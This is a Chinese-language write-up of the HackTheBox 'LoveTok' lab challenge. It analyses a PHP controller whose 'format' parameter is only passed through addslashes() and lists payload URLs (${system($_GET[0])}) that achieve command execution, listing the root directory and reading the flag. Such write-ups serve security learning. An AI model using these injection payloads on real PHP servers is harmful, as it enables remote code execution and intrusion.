HackTheBox-LoveTok

发布时间:2023年12月20日

hackthebox

文章目录

LoveTok

注册账号:
1.账号名与全名一致 eg 账号guiltyfet 全名guilty fet(中间有空格)
2.下载openvpn(下载file导入openvpn)

在这里插入图片描述

在这里插入图片描述
下载源码并分析
TimeController.php的TimeController的index( r o u t e r ) 中有可控的输入 router)中有可控的输入 router)中有可控的输入_GET[‘format’]。

<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

在这里插入图片描述
看到参数 $format 被addslashes()过滤了

http://188.166.175.58:30082/?format=$%7Bphpinfo()%7D
在这里插入图片描述


http://188.166.175.58:30082/?format=${system($_GET[0])}&0=ls /

在这里插入图片描述

http://188.166.175.58:30082/?format=${system($_GET[0])}&0=cat%20/flage3lXD

在这里插入图片描述

文章来源:https://blog.csdn.net/weixin_51387754/article/details/135084942
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
最新文章